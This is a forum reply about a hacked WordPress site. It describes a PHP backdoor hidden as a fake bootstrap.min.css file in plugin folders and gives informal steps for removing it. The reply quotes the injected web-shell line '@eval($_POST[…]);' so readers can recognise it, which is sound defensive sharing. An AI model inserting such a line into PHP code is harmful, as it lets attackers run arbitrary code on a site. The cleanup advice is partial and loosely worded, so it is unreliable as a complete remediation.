Hi I Had the same problem but I found why happening
The problem is one of your installed pluguins ( may be one not installed direct from www.remarpro.com)
The Virus is inside a hiden PHP file called; bootstrap.min.css Is not really a .css is a php file.
First of all:
make your back up.
then erase the file. bootstrap.min.css you must looking for inside your pluguins folders
and rename the files afected usually this ones:
./wp-admin/includes/class-pclzip.php_bak
./wp-content/plugins/revslider/revslider.php
./wp-content/plugins/title-remover/title-remover.php
etc…
You will se that the firs line is extralong with the hacked line and text: @eval($_POST[“wp_ajx_request”]); many times.
You must erase the first line in each .php file an rename it just : <?php
in the uploads folder you must erase the duplicated files with this size: 122×356 px
You must activate the pluguins again and everything will be in its place.
Salud!
-
This reply was modified 6 years, 5 months ago by estudiramis.
-
This reply was modified 6 years, 5 months ago by estudiramis.
